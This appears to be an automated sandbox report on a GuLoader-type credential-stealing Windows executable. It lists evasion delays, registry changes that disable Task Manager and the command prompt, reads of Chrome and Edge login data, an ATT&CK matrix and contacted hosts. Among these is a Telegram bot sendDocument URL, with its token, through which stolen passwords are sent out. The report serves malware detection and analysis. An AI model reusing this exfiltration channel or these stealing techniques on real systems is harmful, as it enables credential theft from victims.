Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598219
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598109
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 598000
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597891
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597781
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597672
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597562
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597453
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597344
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597234
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597125
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 597016
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596891
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596707
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596534
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596391
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596257
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596141
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 596031
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595922
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595812
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595703
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595594
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595359
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595250
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595141
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 594922
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 594703
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 594592
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 594484
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Thread delayed: delay time: 594375
Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000526B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWe
Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000526B000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005200000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | API call chain: ExitProcess graph end node | graph_0-4589
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | API call chain: ExitProcess graph end node | graph_0-4746
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_70091B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70091B5F
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Process created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Users\user\Desktop\rXKfKM0T49.exe VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Registry value created: DisableTaskMgr 1
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Registry value created: DisableCMD 1
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rXKfKM0T49.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
MITRE ATT&CK Matrix (numbers prefix the techniques matched by signatures in this analysis; cells without a number are unmatched matrix entries)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 215 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label | Link
rXKfKM0T49.exe | 75% | Virustotal | | Browse
rXKfKM0T49.exe | 78% | ReversingLabs | Win32.Trojan.GuLoader |
rXKfKM0T49.exe | 100% | Avira | HEUR/AGEN.1337946 |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://api.telegram.orgL | 0% | Avira URL Cloud | safe |
http://checkip.dyndn | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 216.58.206.46 | true | false | | high
drive.usercontent.google.com | 142.250.181.225 | true | false | | high
reallyfreegeoip.org | 104.21.96.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/#& | rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org | rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000358FF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003583C000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035827000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/translate_a/element.js | rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005200000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.orgL | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065 | rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189ec | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000527B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | rXKfKM0T49.exe | false | | high
http://api.telegram.org | rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndn | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
216.58.206.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588260
                                                                  Start date and time:2025-01-10 23:09:57 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 28s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:rXKfKM0T49.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 167
                                                                  • Number of non-executed functions: 109
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:11:58 | API Interceptor | 16750x Sleep call for process: rXKfKM0T49.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger |
 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger |
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT |
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT |
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT |
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger |
 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger |
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT |
 | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT |
 | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT |
104.21.96.1 | gH3LlhcRzg.exe | malicious | FormBook | www.dejikenkyu.cyou/58m5/
 | EIvidclKOb.exe | malicious | FormBook | www.mffnow.info/0pqe/
 | zE1VxVoZ3W.exe | malicious | FormBook | www.aonline.top/fqlg/
 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
 | SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
 | Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/
132.226.247.73 | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | upXUt2jZ0S.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | oEQp0EklDb.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | ajRZflJ2ch.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
 | 19d6P55zd1.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
 | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.48.1
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
 | VQsnGWaNi5.exe | malicious | Snake Keylogger | 104.21.48.1
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
 | upXUt2jZ0S.exe | malicious | Snake Keylogger | 104.21.48.1
checkip.dyndns.com | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
 | UF7jzc7ETP.exe | malicious | MassLogger RAT | 132.226.8.169
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
 | VQsnGWaNi5.exe | malicious | Snake Keylogger | 193.122.130.0
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
api.telegram.org | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | SABXJ1B5c8.exe | malicious | MassLogger RAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
CLOUDFLARENETUS | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
 | gH3LlhcRzg.exe | malicious | FormBook | 104.21.96.1
 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
 | M7XS5C07kV.exe | malicious | FormBook | 172.67.186.192
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
 | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.48.1
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
 | VQsnGWaNi5.exe | malicious | Snake Keylogger | 104.21.48.1
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
 | http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ= | malicious | Unknown | 104.17.25.14
UTMEMUS | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
 | UF7jzc7ETP.exe | malicious | MassLogger RAT | 132.226.8.169
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 132.226.8.169
 | upXUt2jZ0S.exe | malicious | Snake Keylogger | 132.226.247.73
